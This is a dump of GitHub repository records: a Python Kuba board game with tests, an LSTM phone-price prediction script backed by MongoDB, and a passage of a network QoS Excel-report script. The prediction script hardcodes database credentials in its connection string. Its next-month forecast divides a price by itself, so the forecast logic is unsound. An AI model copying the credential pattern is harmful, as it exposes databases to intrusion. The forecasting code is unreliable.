repo_name | repo_url | snapshot_id | revision_id | directory_id | branch_name | visit_date | revision_date | committer_date | github_id | star_events_count | fork_events_count | gha_license_id | gha_created_at | gha_updated_at | gha_pushed_at | gha_language | files | num_files
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---
JacobO1994/Kuba | https://github.com/JacobO1994/Kuba | 99845c99123823753fefd34f4126f3e31c234b73 | c565906497e6cdd55a18c3bde700e1c254189140 | f66f7ab7e87d3b9316a0e40f94c7b6586e8f2fc5 | refs/heads/main | 2023-08-05T06:57:25.166823 | 2021-08-24T14:02:36 | 2021-08-24T14:02:36 | 376,950,973 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7805092334747314,
"alphanum_fraction": 0.7805092334747314,
"avg_line_length": 141.375,
"blob_id": "04c6086fb53b7e0a3bf8aaf61729238c8c895f54",
"content_id": "5ae25a2067f41929cd05a0b92495c52aa8f4bc91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1139,
"license_type": "no_license",
"max_line_length": 877,
"num_lines": 8,
"path": "/README.md",
"repo_name": "JacobO1994/Kuba",
"src_encoding": "UTF-8",
"text": "# Kuba\nA python implementation of the board-game, Kuba.\n\n## Objective\nA player wins by pushing off and capturing seven neutral red stones or by pushing off all of the opposing stones. A player who has no legal moves available has lost the game.\n\n## Game Rules\nWith alternating turns, players move a single marble in any orthogonal direction. In order to slide a marble, however, there must be access to it. For example, to slide a marble to the left, the cell just to the right if it must be vacant. If there are other marbles; your own, your opponent's or the neutral red ones; in the direction of your move at the cell you are moving to, those marbles are pushed one cell forward along the axis of your move. Up to six marbles can be pushed by your one marble on your turn. Although a player cannot push off one of his own marbles, any opposing counters that are pushed off are removed from the game and any neutral counters that are pushed off are captured by the pushing player to add to his or her store of captured neutral red marbles. If you manage to push off a neutral or opposing marble, you are entitled to another turn.\n"
},
{
"alpha_fraction": 0.4649425148963928,
"alphanum_fraction": 0.4951149523258209,
"avg_line_length": 41.43902587890625,
"blob_id": "5108687279abeaf41c5409174a0bb2abbe1132aa",
"content_id": "41e612fdffbdf6c70b471afb4257118535245c6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3480,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 82,
"path": "/test-KubaGame.py",
"repo_name": "JacobO1994/Kuba",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom KubaGame import *\n\n\nclass MyTestCase(unittest.TestCase):\n def test_winner(self):\n game = KubaGame((\"Jake\", 'W'), (\"Kenna\", 'B'))\n game.make_move(\"Jake\", (6, 5), \"F\")\n game.make_move(\"Kenna\", (0, 6), \"B\")\n game.make_move(\"Jake\", (4, 5), \"L\")\n game.make_move(\"Kenna\", (0, 5), \"B\")\n game.make_move(\"Jake\", (4, 4), \"L\")\n game.make_move(\"Kenna\", (2, 6), \"L\")\n game.make_move(\"Jake\", (4, 3), \"L\")\n game.make_move(\"Kenna\", (2, 5), \"L\")\n game.make_move(\"Jake\", (4, 2), \"L\")\n game.make_move(\"Kenna\", (2, 4), \"L\")\n game.make_move(\"Jake\", (4, 1), \"L\")\n game.make_move(\"Kenna\", (2, 3), \"L\")\n game.make_move(\"Jake\", (0, 0), \"B\")\n game.make_move(\"Kenna\", (5, 0), \"R\")\n game.make_move(\"Jake\", (4, 0), \"F\")\n game.make_move(\"Kenna\", (5, 1), \"R\")\n game.make_move(\"Jake\", (3, 0), \"R\")\n game.make_move(\"Kenna\", (5, 2), \"R\")\n game.make_move(\"Jake\", (3, 1), \"R\")\n game.make_move(\"Kenna\", (5, 3), \"R\")\n game.make_move(\"Jake\", (3, 2), \"R\")\n game.make_move(\"Kenna\", (5, 4), \"R\")\n game.make_move(\"Jake\", (3, 3), \"R\")\n game.make_move(\"Kenna\", (6, 0), \"F\")\n game.make_move(\"Jake\", (3, 4), \"R\")\n self.assertEqual(\"Jake\", game.get_winner())\n\n def test_capture_one_left_board(self):\n game = KubaGame((\"Jake\", 'W'), (\"Kenna\", 'B'))\n game.make_move(\"Jake\", (6, 6), 'F')\n game.make_move(\"Kenna\", (0, 6), 'B')\n game.make_move(\"Jake\", (5, 6), 'F')\n game.make_move(\"Kenna\", (6, 0), 'R')\n game.make_move(\"Jake\", (3, 6), 'L')\n game.make_move(\"Kenna\", (6, 1), 'R')\n game.make_move(\"Jake\", (3, 5), 'L')\n self.assertEqual(1, game.get_captured(\"Jake\"))\n\n def test_capture_one_right_board(self):\n game = KubaGame((\"Jake\", 'W'), (\"Kenna\", 'B'))\n game.make_move(\"Kenna\", (6, 0), 'F')\n game.make_move(\"Jake\", (0, 0), 'R')\n game.make_move(\"Kenna\", (5, 0), 'F')\n game.make_move(\"Jake\", (0, 1), \"R\")\n game.make_move(\"Kenna\", (3, 0), \"R\")\n game.make_move(\"Jake\", (0, 2), \"R\")\n game.make_move(\"Kenna\", (3, 1), \"R\")\n self.assertEqual(1, game.get_captured(\"Kenna\"))\n\n def test_capture_one_top_board(self):\n game = KubaGame((\"Jake\", 'W'), (\"Kenna\", 'B'))\n game.make_move(\"Kenna\", (6, 0), 'R')\n game.make_move(\"Jake\", (0, 0), 'B')\n game.make_move(\"Kenna\", (6, 1), 'R')\n game.make_move(\"Jake\", (1, 0), 'B')\n game.make_move(\"Kenna\", (6, 3), 'F')\n game.make_move(\"Jake\", (2, 0), 'B')\n game.make_move(\"Kenna\", (5, 3), 'F')\n self.assertEqual(1, game.get_captured(\"Kenna\"))\n\n def test_ko_rule(self):\n \"\"\" Tests if the Ko Rule is violated & handled properly\"\"\"\n game = KubaGame((\"Jake\", 'W'), (\"Kenna\", 'B'))\n game.make_move(\"Kenna\", (6, 0), 'F')\n game.make_move(\"Jake\", (0, 0), 'B')\n game.make_move(\"Kenna\", (5, 0), 'F')\n game.make_move(\"Jake\", (1, 0), 'B')\n test = game.make_move(\"Kenna\", (5, 0), 'F')\n self.assertEqual(False, test) # Tests that the move results in a Ko rule violation & thus False result\n player_remains_up = game.get_current_turn()\n self.assertEqual(\"Kenna\", player_remains_up) # This test ensures that the player stays up to move after attempting a Ko-Rule violation\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.45618557929992676,
"alphanum_fraction": 0.46484270691871643,
"avg_line_length": 41.38655471801758,
"blob_id": "c088eb19b1701061a7006e5f24ae633d1604fd9a",
"content_id": "0d99c497bb5766bb1308e1a7c94ed3158c5d7e5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15132,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 357,
"path": "/KubaGame.py",
"repo_name": "JacobO1994/Kuba",
"src_encoding": "UTF-8",
"text": "# Author: Jacob Ogle\n# Description: A program that allows two users to play the board game, Kuba.\nimport copy\n\n\nclass Player:\n \"\"\"A class that represents the players of the game\"\"\"\n\n def __init__(self, player_data_tuple):\n \"\"\"Class initializer for player data\"\"\"\n self._name = player_data_tuple[0]\n self._piece = player_data_tuple[1]\n self._number_pieces_on_board = 8\n self._current_red_holdings = 0\n self._player_first_move = True\n\n def get_name(self):\n \"\"\"Returns the players name\"\"\"\n return self._name\n\n def get_piece(self):\n \"\"\"Returns the player piece type in a string: X or O\"\"\"\n return self._piece\n\n def get_number_pieces_on_board(self):\n \"\"\"Returns the number of pieces left on the board for the player\"\"\"\n return self._number_pieces_on_board\n\n def get_current_red_holdings(self):\n \"\"\"Returns the number of red marbles the player is holding\"\"\"\n return self._current_red_holdings\n\n def get_is_first_move(self):\n \"\"\"Returns the value of the players first move\"\"\"\n return self._player_first_move\n\n def increment_red_holding(self):\n \"\"\"Increments the red holding by one of the player\"\"\"\n self._current_red_holdings += 1\n\n def set_is_first_move_to_false(self):\n \"\"\"Sets the players first move bool value to False once player makes first move\"\"\"\n self._player_first_move = False\n\n\nclass KubaGame:\n \"\"\" Class representing the logical components of the Kuba game\"\"\"\n\n def __init__(self, player_one_name_and_color, player_two_name_and_color):\n \"\"\"Class initializer that takes player name and color as tuple and initializes the board\"\"\"\n self._board = [\n ['N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N'],\n ['N', 'W', 'W', ' ', ' ', ' ', 'B', 'B', 'N'],\n ['N', 'W', 'W', ' ', 'R', ' ', 'B', 'B', 'N'],\n ['N', ' ', ' ', 'R', 'R', 'R', ' ', ' ', 'N'],\n ['N', ' ', 'R', 'R', 'R', 'R', 'R', ' ', 'N'],\n ['N', ' ', ' ', 'R', 'R', 'R', ' ', ' ', 'N'],\n ['N', 'B', 'B', ' ', 'R', ' ', 'W', 'W', 'N'],\n ['N', 'B', 'B', ' ', ' ', ' ', 'W', 'W', 'N'],\n ['N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N']\n ]\n self._board_history = []\n self._player_one = Player(player_one_name_and_color)\n self._player_two = Player(player_two_name_and_color)\n self._current_players = [self._player_one, self._player_two]\n self._first_move_made = False\n self._current_turn = None\n self._winner = None\n self._move_counter = 0\n\n def set_current_turn(self, player):\n \"\"\"Sets the current turn to the player\"\"\"\n self._current_turn = player.get_name()\n\n def get_current_turn(self):\n \"\"\"\" Returns the current turns player Name if there is one, returns none otherwise\"\"\"\n if self._current_turn is None:\n return None\n return self._current_turn\n\n def get_winner(self):\n \"\"\"Returns the name of the winner if there is one, None otherwise\"\"\"\n if self._winner is None:\n return None\n return self._winner\n\n def get_captured(self, player_name):\n \"\"\"Returns the passed players current red marble holdings\"\"\"\n player = [i for i in self._current_players if i.get_name() == player_name]\n if player[0].get_current_red_holdings() == 0:\n return 0\n else:\n return player[0].get_current_red_holdings()\n\n def get_off_board(self, coordinates):\n \"\"\" Checks if a move will push a piece off the board\"\"\"\n y = coordinates[0]\n x = coordinates[1]\n if self._board[y][x] == 'N':\n return 'N'\n else:\n return False\n\n def get_marble(self, coordinates):\n \"\"\"Returns the marble at the passed coordinates if theres is one, 
otherwise, returns 'X' \"\"\"\n y = coordinates[0] + 1\n x = coordinates[1] + 1\n if self._board[y][x] == 'W' or self._board[y][x] == 'B' or self._board[y][x] == 'R':\n return self._board[y][x]\n elif self._board[y][x] == ' ':\n return 'X'\n\n def get_marble_count(self):\n \"\"\" Returns the count of marbles on the board in a tuple (W,B,R) \"\"\"\n white = 0\n black = 0\n red = 0\n for i in self._board:\n for j in i:\n if j == 'W':\n white += 1\n elif j == 'B':\n black += 1\n elif j == 'R':\n red += 1\n return white, black, red\n\n def ko_rule_check(self):\n \"\"\"Checks if the player making the current move is violating the Ko rule - meaning pushing\n the board back to the previous state\"\"\"\n if self._move_counter < 3:\n return True\n if self._board_history[-1] == self._board_history[-3]:\n print(\"There was a KO Rule violation - board reset - player re-try new move\")\n self._board = self._board_history[-2]\n return False\n return True\n\n def check_valid_move(self, player_match, desired_move, direction):\n \"\"\"\n A series of logical checks in-line with the rules of Kuba to ensure a move is valid\n Takes player match, the desired move coordinates and direction of desired move a parameters.\n \"\"\"\n valid_directions = ['F', 'B', 'R', 'L']\n y = desired_move[0]\n x = desired_move[1]\n if self._first_move_made is False: # Updates the first move status when game is started\n self._first_move_made = True\n self.set_current_turn(player_match[0])\n if self.get_winner() is not None:\n return False\n if player_match[0].get_name() != self.get_current_turn():\n print(\"Sorry, it is not this players turn. Please change player and try again.\")\n return False\n if desired_move[0] < 1 or desired_move[0] > 7: # Checking bounds of the board\n return False\n if desired_move[1] < 1 or desired_move[1] > 7: # Checking bounds of the board\n return False\n if direction not in valid_directions: # Ensuring the direction is valid\n return False\n if self._board[y][x] != player_match[0].get_piece(): # Checking piece to be moved isn't the current players\n return False\n if direction == 'F':\n if self._board[y + 1][x] == 'N' or self._board[y + 1][x] == ' ':\n pass\n else:\n return False\n if direction == 'B':\n if self._board[y - 1][x] == 'N' or self._board[y - 1][x] == ' ':\n pass\n else:\n return False\n if direction == 'R':\n if self._board[y][x - 1] == 'N' or self._board[y][x - 1] == ' ':\n pass\n else:\n return False\n if direction == 'L':\n if self._board[y][x + 1] == 'N' or self._board[y][x + 1] == ' ':\n pass\n else:\n return False\n return True\n\n def check_opponent_pieces(self, current_player, opposing_player):\n \"\"\"\n Checks if the opponent has any pieces to move on the board, if not returns False, otherwise return True.\n Function receives the player object of the opponent after the player makes their move. 
Will update\n the current player to be the winner if true.\n \"\"\"\n marble_counts = self.get_marble_count()\n if opposing_player.get_piece() == 'W':\n if marble_counts[0] == 0:\n self._winner = current_player.get_name()\n return False\n else:\n return True\n elif opposing_player.get_piece() == 'B':\n if marble_counts[1] == 0:\n self._winner = current_player.get_name()\n return False\n else:\n return True\n\n def next_piece_tracker(self, x_value, y_value, move_direction):\n \"\"\"\n A function to get the next piece on the board- used for checking the rows or columns for make move.\n Takes the x_value, y_value and move direction and will get the next piece based on the direction.\n \"\"\"\n if move_direction == \"F\":\n if self._board[y_value - 1][x_value] == 'N':\n return 'N'\n elif self._board[y_value - 1][x_value] == ' ':\n return ' '\n return False\n elif move_direction == \"B\":\n if self._board[y_value + 1][x_value] == 'N':\n return 'N'\n elif self._board[y_value + 1][x_value] == ' ':\n return ' '\n return False\n elif move_direction == \"R\":\n if self._board[y_value][x_value + 1] == 'N':\n return 'N'\n elif self._board[y_value][x_value + 1] == ' ':\n return ' '\n return False\n elif move_direction == \"L\":\n if self._board[y_value][x_value - 1] == 'N':\n return 'N'\n elif self._board[y_value][x_value - 1] == ' ':\n return ' '\n return False\n\n def make_move(self, player_name, coordinates, direction):\n \"\"\"\n Takes a player name, tuple coordinates (X, Y), and direction to move { F, R, L, R } if the move is valid,\n the function will make the move and update winner status if one is determined, players holdings, next player\n turn.\n \"\"\"\n player_match = [i for i in self._current_players if i.get_name() == player_name]\n other_player = [i for i in self._current_players if i not in player_match]\n desired_move = coordinates\n y = desired_move[0] + 1\n x = desired_move[1] + 1\n board_adjusted_coords = (y, x) # (row, col)\n if self.check_valid_move(player_match, board_adjusted_coords, direction) is False:\n return False\n else:\n if direction == 'F':\n if self._board[y - 1][x] == ' ':\n self._board[y][x] = ' '\n self._board[y - 1][x] = player_match[0].get_piece()\n else:\n y_base = y\n y_pointer = y_base - 1\n while y_pointer > 0:\n if self._board[y_pointer][x] == 'N' or self._board[y_pointer][x] == ' ':\n break\n else:\n y_pointer -= 1\n if self._board[y_pointer][x] == 'N':\n if self._board[y_pointer + 1][x] == 'R':\n player_match[0].increment_red_holding()\n diff = y_base - y_pointer\n while diff > 0:\n self._board[y_pointer][x] = self._board[y_pointer + 1][x]\n diff -= 1\n y_pointer += 1\n self._board[y][x] = ' '\n self._board[0][x] = 'N'\n elif direction == 'B':\n if self._board[y + 1][x] == ' ':\n self._board[y][x] = ' '\n self._board[y + 1][x] = player_match[0].get_piece()\n else:\n y_base = y\n y_pointer = y_base + 1\n while y_pointer < 7:\n if self._board[y_pointer][x] == 'N' or self._board[y_pointer][x] == ' ':\n break\n else:\n y_pointer += 1\n if self._board[y_pointer][x] == 'N':\n if self._board[y_pointer - 1][x] == 'R':\n player_match[0].increment_red_holding()\n diff = y_pointer - y_base\n while diff > 0:\n self._board[y_pointer][x] = self._board[y_pointer - 1][x]\n diff -= 1\n y_pointer -= 1\n self._board[y][x] = ' '\n self._board[8][x] = 'N'\n elif direction == 'L':\n if self._board[y][x - 1] == ' ':\n self._board[y][x - 1] = player_match[0].get_piece()\n self._board[y][x] = ' '\n else:\n x_base = x\n x_pointer = x_base - 1\n while x_pointer >= 0:\n if 
self._board[y][x_pointer] == 'N' or self._board[y][x_pointer] == ' ':\n break\n else:\n x_pointer -= 1\n counter = 0\n diff = x_base - x_pointer\n if self._board[y][x_pointer] == 'N':\n if self._board[y][x_pointer + 1] == 'R':\n player_match[0].increment_red_holding()\n while counter < diff:\n self._board[y][x_pointer] = self._board[y][x_pointer + 1]\n x_pointer += 1\n counter += 1\n self._board[y][x_base] = ' '\n self._board[y][0] = 'N'\n elif direction == 'R':\n if self._board[y][x + 1] == ' ':\n self._board[y][x] = ' '\n self._board[y][x + 1] = player_match[0].get_piece()\n else:\n x_base = x\n x_pointer = x_base + 1\n while x_pointer <= 7:\n if self._board[y][x_pointer] == 'N' or self._board[y][x_pointer] == ' ':\n break\n else:\n x_pointer += 1\n counter = 0\n diff = x_pointer - x_base\n if self._board[y][x_pointer] == 'N':\n if self._board[y][x_pointer - 1] == 'R':\n player_match[0].increment_red_holding()\n while counter < diff:\n self._board[y][x_pointer] = self._board[y][x_pointer - 1]\n x_pointer -= 1\n counter += 1\n self._board[y][x_base] = ' '\n self._board[y][8] = 'N'\n self._board_history.append(copy.deepcopy(self._board))\n if not self.check_opponent_pieces(player_match[0], other_player[0]):\n return False\n if self.ko_rule_check() is False:\n return False\n self.set_current_turn(other_player[0])\n self._move_counter += 1\n if player_match[0].get_current_red_holdings() == 7:\n self._winner = player_match[0].get_name()\n return True\n\n def print_board(self):\n \"\"\"Prints the current state of the board.\"\"\"\n print('===============')\n for i in self._board:\n print(\"|\" + i[0] + \"|\" + i[1] + \"|\" + i[2] + \"|\" + i[3] + \"|\" + i[4] + \"|\" + i[5] + \"|\" + i[6] + \"|\" + i[\n 7] + \"|\" + i[8] + \"|\")\n print('===============')\n"
}
] | 3 |
Chamikacp/Time-Series-Prediction-with-LSTM | https://github.com/Chamikacp/Time-Series-Prediction-with-LSTM | edb1e67a9bd2bff126222cd9f3d96f996f6786fc | 61cbc71e81af636751a1787623df4422cb7eaf06 | cdd0d0f3c730bb983aa0c185e9a4de680de91bc0 | refs/heads/main | 2023-07-24T18:14:52.960861 | 2021-09-05T17:10:55 | 2021-09-05T17:10:55 | 403,367,460 | 2 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6886109113693237,
"alphanum_fraction": 0.6978275179862976,
"avg_line_length": 37.71241760253906,
"blob_id": "5ff8d8b7d11aba5fc8ff3bc9f352dd27a447f708",
"content_id": "320b46198629e20f0a5fa0a7cf2bd4c7486a3f58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6076,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 153,
"path": "/Mobiuler Price Prediction.py",
"repo_name": "Chamikacp/Time-Series-Prediction-with-LSTM",
"src_encoding": "UTF-8",
"text": "from pymongo import MongoClient\r\nimport numpy\r\nimport matplotlib.pyplot as pyPlot\r\nimport math\r\nimport pandas\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom keras.models import Sequential\r\nfrom keras.layers import LSTM\r\nfrom keras.layers import Dense\r\n\r\n# To fix a randomSeed\r\nnumpy.random.seed(7)\r\n\r\n# Create connection with MONGODB\r\nclient = MongoClient(\"mongodb+srv://mobiuler:[email protected]/test?retryWrites=true&w=majority\")\r\nmongoDb = client.get_database('Mobiuler')\r\nmCollection = mongoDb.get_collection('price_details')\r\n\r\n# List of available phones in database\r\n# availablePhones = [\"Apple iPhone Xr\"]\r\navailablePhones = []\r\nfor doc in mCollection.find():\r\n name = str(doc['phone_name'])\r\n availablePhones.append(name)\r\n\r\nprint(availablePhones)\r\n\r\n\r\ndef prediction():\r\n # Assigning the dataFrame\r\n mobiulerDataFrame = pandas.DataFrame(allPrices)\r\n mobiulerDataFrame.Date = pandas.to_datetime(mobiulerDataFrame.Date)\r\n mobiulerDataFrame = mobiulerDataFrame.set_index(\"Date\")\r\n\r\n # Creating mobiulerDataset\r\n mobiulerDataset = mobiulerDataFrame.values\r\n\r\n # Visualize the price history\r\n pyPlot.figure(figsize=(16, 8))\r\n pyPlot.title(phoneModel + ' Price History', fontsize=25)\r\n pyPlot.plot(mobiulerDataFrame['Price'])\r\n pyPlot.xlabel('Date', fontsize=18)\r\n pyPlot.ylabel('Price', fontsize=18)\r\n pyPlot.show()\r\n\r\n # Normalizing the created mobiulerDataset\r\n mobiulerScaler = MinMaxScaler(feature_range=(0, 1))\r\n mobiulerDataset = mobiulerScaler.fit_transform(mobiulerDataset)\r\n\r\n # Spliting the mobiulerDataset into trainData and testData\r\n trainingDatasetSize = int(len(mobiulerDataset) * 0.67)\r\n testingDatasetSize = len(mobiulerDataset) - trainingDatasetSize\r\n trainData = mobiulerDataset[0:trainingDatasetSize, :]\r\n testData = mobiulerDataset[trainingDatasetSize:len(mobiulerDataset), :]\r\n\r\n # To Convert create a matrix using NumPy\r\n def createNewDataset(newDataset, backStep):\r\n dataXArray, dataYArray = [], []\r\n for i in range(len(newDataset) - backStep):\r\n a = newDataset[i:(i + backStep), 0]\r\n dataXArray.append(a)\r\n dataYArray.append(newDataset[i + backStep, 0])\r\n return numpy.array(dataXArray), numpy.array(dataYArray)\r\n\r\n # Reshaping the x,y data to t and t+1\r\n backStep = 1\r\n trainXData, trainYData = createNewDataset(trainData, backStep)\r\n testXData, testYData = createNewDataset(testData, backStep)\r\n\r\n # Reshaping the inputData [samples, time steps, features]\r\n trainXData = numpy.reshape(trainXData, (trainXData.shape[0], 1, trainXData.shape[1]))\r\n testXData = numpy.reshape(testXData, (testXData.shape[0], 1, testXData.shape[1]))\r\n\r\n # Creating the LSTM model and fit the model\r\n model = Sequential()\r\n model.add(LSTM(4, input_shape=(1, backStep)))\r\n model.add(Dense(1))\r\n model.compile(loss='mean_squared_error', optimizer='adam')\r\n model.fit(trainXData, trainYData, epochs=100, batch_size=1, verbose=2)\r\n\r\n # Predicting Train and Test Data\r\n trainPrediction = model.predict(trainXData)\r\n testPrediction = model.predict(testXData)\r\n\r\n # Inverting the predicted data\r\n trainPrediction = mobiulerScaler.inverse_transform(trainPrediction)\r\n trainYData = mobiulerScaler.inverse_transform([trainYData])\r\n testPrediction = mobiulerScaler.inverse_transform(testPrediction)\r\n testYData = mobiulerScaler.inverse_transform([testYData])\r\n\r\n # Calculating the RootMeanSquaredError 
(RMSE)\r\n phoneTrainingScore = math.sqrt(mean_squared_error(trainYData[0], trainPrediction[:, 0]))\r\n print('Train Score of a phone: %.2f RMSE' % phoneTrainingScore)\r\n phoneTestingScore = math.sqrt(mean_squared_error(testYData[0], testPrediction[:, 0]))\r\n print('Test Score of a phone: %.2f RMSE' % phoneTestingScore)\r\n\r\n # Shifting the trainData for plotting\r\n trainPredictionPlot = numpy.empty_like(mobiulerDataset)\r\n trainPredictionPlot[:, :] = numpy.nan\r\n trainPredictionPlot[backStep:len(trainPrediction) + backStep, :] = trainPrediction\r\n\r\n # Shifting the testData for plotting\r\n testPredictionPlot = numpy.empty_like(mobiulerDataset)\r\n testPredictionPlot[:, :] = numpy.nan\r\n testPredictionPlot[len(trainPrediction) + (backStep * 2) - 1:len(mobiulerDataset) - 1, :] = testPrediction\r\n\r\n # To Plot the available all data,training and tested data\r\n pyPlot.figure(figsize=(16, 8))\r\n pyPlot.title(phoneModel + ' Predicted Price', fontsize=25)\r\n pyPlot.plot(mobiulerScaler.inverse_transform(mobiulerDataset), 'b', label='Original Prices')\r\n pyPlot.plot(trainPredictionPlot, 'r', label='Trained Prices')\r\n pyPlot.plot(testPredictionPlot, 'g', label='Predicted Prices')\r\n pyPlot.legend(loc='upper right')\r\n pyPlot.xlabel('Number of Days', fontsize=18)\r\n pyPlot.ylabel('Price', fontsize=18)\r\n pyPlot.show()\r\n\r\n # To PREDICT FUTURE VALUES\r\n last_month_price = testPrediction[-1]\r\n last_month_price_scaled = last_month_price / last_month_price\r\n next_month_price = model.predict(numpy.reshape(last_month_price_scaled, (1, 1, 1)))\r\n oldPrice = math.trunc(numpy.ndarray.item(last_month_price))\r\n newPrice = math.trunc(numpy.ndarray.item(last_month_price * next_month_price))\r\n print(\"Last Month Price : \", oldPrice)\r\n print(\"Next Month Price : \", newPrice)\r\n\r\n # Updating the predicted price in database\r\n mobileName = mCollection.find_one({'phone_name': phoneModel})\r\n if bool(mobileName):\r\n price_update = {\r\n 'predicted_price': newPrice\r\n }\r\n\r\n mCollection.update_one({'phone_name': phoneModel}, {'$set': price_update})\r\n\r\n print(phoneModel + \" PRICE UPDATED\")\r\n\r\n # to clear the array\r\n allPrices.clear()\r\n\r\n\r\nallPrices = []\r\n\r\n# To find the previous prices of a smartphone\r\nfor phoneModel in availablePhones:\r\n\r\n for x in mCollection.find({'phone_name': phoneModel}):\r\n prices = x['prices']\r\n for y in prices:\r\n allPrices.append(y)\r\n\r\n prediction()\r\n"
}
] | 1 |
ileammontoya/Proyecto-OIDs | https://github.com/ileammontoya/Proyecto-OIDs | 5b95d637536aa9cbb9e49c0be128c86a0c9385e9 | b40039a4d0939c7ea8e112e9110a0c17d339993a | 85e1f76e7817fe51a41e97e6a378ec40fb3f2e5e | refs/heads/master | 2021-01-25T12:23:48.425631 | 2018-03-01T19:51:31 | 2018-03-01T19:51:31 | 123,469,114 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6300246715545654,
"alphanum_fraction": 0.6626763939857483,
"avg_line_length": 41.93600082397461,
"blob_id": "e83437ea1cd64875c17d1314fbff42cf97922a41",
"content_id": "18ef0556dbc627e126d959798304352e31b72137",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21469,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 500,
"path": "/Excels/OIDExcelGuatemala.py",
"repo_name": "ileammontoya/Proyecto-OIDs",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\nimport os\nimport glob\nimport os\nimport stat\nimport openpyxl\nfrom openpyxl.styles import Font, PatternFill, Border, Alignment, Side\n\ntestcounter=0\n\ntitlecolor = PatternFill(fill_type='solid',\n\t\t\t\t\t\tstart_color='FF0000',\n\t\t\t\t\t\tend_color='FF0000')\ntitlefont = Font(size=15,\n\t\t\t\tcolor='FFFFFF')\n\ncellalignment = Alignment(horizontal='center',\n\t\t\t\t\t\t\tvertical='center')\n\nsecondcolor = PatternFill(fill_type='solid',\n\t\t\t\t\t\t\tstart_color='000000',\n\t\t\t\t\t\t\tend_color='000000')\n\nsecondfont = Font(color='FFFFFF')\n\ncellcolor = PatternFill(fill_type='lightGrid',\n\t\t\t\t\t \tstart_color='FFFFFF',\n\t\t\t\t\t \tend_color='FFFFFF')\n\nthin_border = Border(left=Side(style='thin'), \n right=Side(style='thin'), \n top=Side(style='thin'), \n bottom=Side(style='thin'))\n\n\n#Ciclos redundantes para buscar los indices de cada OID dependiendo de la interfaz donde se encuentra aplicada\n#Los primeros dos ciclos y el if dan la relacion de la interfaz y el indice de calidad de servicio\ndef writeexcel(diccionarios,fila,host):\n\tglobal testcounter\n\tinterestingclasses=['Enrutamiento-Senalizacion','EnrutamientoSenalizacion','Datos_VPN_Internet_plus','Ingenieria','Datos_VPN','Video','Aplicaciones-Tiempo-Real', 'class-default']\n\tqosinterfacepolicy=[]\n\tqospolicycontrol=0\n\t#inind==diccionarios[0]\n\t#inqosind==diccionarios[1]\n\t#mapas==diccionarios[2]\n\t#inclaseind==diccionarios[3]\n\t#counterprev==diccionarios[4]\n\t#gaugeprev==diccionarios[5]\n\t#counterpost==diccionarios[6]\n\t#gaugepost==diccionarios[7]\n\t#ifipindex==diccionarios[8]\n\t#ifqosindex==diccionarios[9]\n\t#queueingindex==diccionarios[10]\n\t#queueingcurrent==diccionarios[11]\n\t#queueingmax==diccionarios[12]\n\t#queueingdiscards==diccionarios[13]\n\n\t#Ciclos para juntar Interfaz con la politica que esta aplicada\n\t#se hicieron en el mismo orden que los ciclos de impresion en excel asi que el orden las politicas e interfaces coindiden en esta lista y en el excel\n\tfor key in diccionarios[0]:\n\t\t\tfor item in diccionarios[1]:\n\t\t\t\tif diccionarios[0][key][0]==diccionarios[1][item][1]:\n\t\t\t\t\tfor extra in diccionarios[3]:\n\t\t\t\t\t\tif diccionarios[1][item][0] in diccionarios[3][extra][0]:\n\t\t\t\t\t\t\tfor indice in diccionarios[9]:\n\t\t\t\t\t\t\t\tif diccionarios[3][extra][1]==diccionarios[9][indice][0]:\n\t\t\t\t\t\t\t\t\tqosinterfacepolicy.append(diccionarios[0][key][1]+' - Policy-Map: '+str(diccionarios[9][indice][1]))\n\t\t\t\t\t\t\t\t\t# test the list in a file\n\t\t\t\t\t\t\t\t\t# my_file=open(\"oidtest\",\"a\")\n\t\t\t\t\t\t\t\t\t# my_file.write(diccionarios[0][key][1]+' - Policy-Map: '+str(diccionarios[9][indice][1]))\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t# my_file.write('\\n')\n\t\t\t\t\t\t\t\t\t# my_file.write('\\n')\n\t\t\t\t\t\t\t\t\t# my_file.close()\n\n\n\n\tfor key in diccionarios[0]:\n\t\tfor item in diccionarios[1]:\n\t\t\t#OLD FILTER FOR CONTROL PLANE AND VLANS\n\t\t\t# if diccionarios[0][key][0]==diccionarios[1][item][1] and (diccionarios[0][key][1]=='Control Plane' or 'Vlan' in diccionarios[0][key][1]):\n\t\t\t# \tsheet.cell(row=fila,column=1).value=host+' - '+diccionarios[8]['value1'][0]\n\t\t\t# \tsheet.merge_cells(start_row=fila,start_column=1, end_row=fila, end_column=4)\n\t\t\t# \tsheet.cell(row=fila,column=1).font=titlefont\n\t\t\t# \tsheet.cell(row=fila,column=1).fill=titlecolor\n\t\t\t# \tsheet.cell(row=fila,column=1).alignment=cellalignment\n\t\t\t# \tsheet.row_dimensions[fila].height=20\n\t\t\t# 
